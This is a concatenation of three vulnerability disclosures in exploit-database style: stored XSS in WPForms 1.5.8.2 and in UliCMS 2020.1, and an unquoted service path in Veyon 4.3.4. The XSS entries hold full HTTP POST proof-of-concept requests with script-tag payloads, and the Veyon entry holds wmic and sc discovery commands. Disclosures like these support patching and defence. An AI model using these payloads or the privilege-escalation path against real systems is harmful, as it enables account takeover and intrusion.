WPForms is a popular WordPress forms plugin with over 3 million active installations. The Form Description and Field Description fields in the WPForms plugin’s Form Builder module was found to be vulnerable to stored XSS, as they did not sanitize user given input properly. While they do not pose high security threat being an authenticated XSS vulnerability, an attacker can potentially exploit this to perform malicious actions on a WordPress multisite installation to have a super admin’s cookies sent to the attacker or redirect the super admin to another domain, for example, a phishing page designed to show that they have been logged out and would need to log back in, thus compromising their credentials. The form builder’s “preview” function was also vulnerable to reflected XSS. All WordPress websites using WPForms version 1.5.8.2 and below are affected.
2. Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: ptest.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ptest.com/wp-admin/admin.php?page=wpforms-builder&view=settings&form_id=23
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 3140
Origin: http://ptest.com
Connection: close
Cookie: wp-saving-post=15-saved; wordpress_db156a460ca831632324809820a538ce=jinson%7C1582145873%7CBKGMGaw77TcSEz7kE0ijBd8VfAq7KwALhBVfKNRbKst%7Cf826697f923b7f17c30049eea275c6523b7e2418ab354e106c50f0314b9bdae9; comment_author_email_db156a460ca831632324809820a538ce=dev-email@flywheel.local; comment_author_db156a460ca831632324809820a538ce=jinson; wp-settings-time-1=1581973079; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_db156a460ca831632324809820a538ce=jinson%7C1582145873%7CBKGMGaw77TcSEz7kE0ijBd8VfAq7KwALhBVfKNRbKst%7Cbaecd49d797bff21499da712891744737c67fd481d59e04a952554579f26c637
action=wpforms_save_form&data=%5B%7B%22name%22%3A%22id%22%2C%22value%22%3A%2223%22%7D%2C%7B%22name%22%3A%22field_id%22%2C%22value%22%3A%2213%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bid%5D%22%2C%22value%22%3A%2211%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Btype%5D%22%2C%22value%22%3A%22text%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Blabel%5D%22%2C%22value%22%3A%22Single+Line+Text%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bdescription%5D%22%2C%22value%22%3A%22%3Cscript%3Ealert(%5C%22XSS+on+form+description%5C%22)%3C%2Fscript%3E%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bsize%5D%22%2C%22value%22%3A%22medium%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bplaceholder%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Blimit_count%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Blimit_mode%5D%22%2C%22value%22%3A%22characters%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bdefault_value%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bcss%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Binput_mask%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bform_title%5D%22%2C%22value%22%3A%22Security+Test+WPForms%22%7D%2C%7B%22name%22%3A%22settings%5Bform_desc%5D%22%2C%22value%22%3A%22%3Cscript%3Ealert(%5C%22XSS+on+form+description+2%5C%22)%3C%2Fscript%3E%22%7D%2C%7B%22name%22%3A%22settings%5Bform_class%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bsubmit_text%5D%22%2C%22value%22%3A%22Submit%22%7D%2C%7B%22name%22%3A%22settings%5Bsubmit_text_processing%5D%22%2C%22value%22%3A%22Sending...%22%7D%2C%7B%22name%22%3A%22settings%5Bsubmit_class%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bhoneypot%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22settings%5Bnotification_enable%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bemail%5D%22%2C%22value%22%3A%22%7Badmin_email%7D%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bsubject%5D%22%2C%22value%22%3A%22New+Security+Test+WPForms+Entry%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bsender_name%5D%22%2C%22value%22%3A%22ptest%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bsender_address%5D%22%2C%22value%22%3A%22%7Badmin_email%7D%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Breplyto%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bmessage%5D%22%2C%22value%22%3A%22%7Ball_fields%7D%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Btype%5D%22%2C%22value%22%3A%22message%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bmessage%5D%22%2C%22value%22%3A%22%3Cp%3EThanks+for+contacting+us!+We+will+be+in+touch+with+you+shortly.%3C%2Fp%3E%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bmessage_scroll%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bpage%5D%22%2C%22value%22%3A%222%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bredirect%5D%22%2C%22value%22%3A%22%22%7D%5D&id=23&nonce=938cf431d2
3. Timeline
Vulnerability reported to the WPForms team – February 18, 2020
WPForms version 1.5.9 containing the fix released – March 5, 2020
# Exploit Title: UliCMS 2020.1 - Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2019-03-24
# Exploit Author: SunCSR
# Vendor Homepage: https://en.ulicms.de
# Software Link: https://en.ulicms.de/current_versions.html
# Version: 2020.1
# Tested on: Windows
# CVE : CVE-2020-12704
### Vulnerability : Stored Cross-Site Scripting
# Description
A stored cross-site-scripting security issue in the save page feature
Url : http://TARGET/ulicms/admin/index.php?action=pages_edit&page=20
Request Type: POST
Vulnerable Parameter : "content"
Payload : content=<script>alert('XSS')</script>
#POC
POST /ulicms/admin/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://TARGET/ulicms/admin/index.php?action=pages_edit&page=20
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 866
Origin: http://TARGET
Connection: close
Cookie: 5e71dbd610916_SESSION=bt38jrlr7ajgc28t6db10mdgu7
csrf_token=f7249e4cc148ffc3383b6f6254dfc6cb&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=20
&slug=lorem_ipsum&title=Lorem+Ipsum&alternate_title=&show_headline=1&type=page&language=de&menu=top&position=15
&parent_id=NULL&active=1&target=_self&hidden=0&category_id=1&menu_image=&link_url=&link_to_language=
&meta_description=&meta_keywords=&robots=&article_author_name=&article_author_email=&article_date=&excerpt=&og_title=
&og_description=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=&list_order_by=title
&list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url=
&text_position=before&article_image=&author_id=1&group_id=1&comments_enabled=null&cache_control=auto&theme=
&access%5B%5D=all&custom_data=%7B%7D&content=<script>alert('XSS')</script>&csrf_token=f7249e4cc148ffc3383b6f6254dfc6cb
### History
=============
2019-03-18 Issue discovered
2019-04-18 Vendor contacted
2019-04-18 Vendor response and hotfix
2019-04-24 Vendor releases fixed versions
# Exploit Title: Veyon 4.3.4 - 'VeyonService' Unquoted Service Path
# Discovery by: Víctor García
# Discovery Date: 2020-03-23
# Vendor Homepage: https://veyon.io/
# Software Link:
https://github.com/veyon/veyon/releases/download/v4.3.4/veyon-4.3.4.0-win64-setup.exe
# Tested Version: 4.3.4
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Pro x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "C:\Windows\\" |findstr /i /v """
Veyon Service VeyonService C:\Program Files\Veyon\veyon-service.exe
# Service info:
C:\>sc qc VeyonService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VeyonService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Veyon\veyon-service.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Veyon Service
DEPENDENCIES : Tcpip
: RpcSs
SERVICE_START_NAME : LocalSystem
# Exploit:
# A successful attempt would require the local user to be able to insert their code in the
# system root path undetected by the OS or other security applications where it could
# potentially be executed during application startup or reboot. If successful, the local
# user's code would execute with the elevated privileges of the application.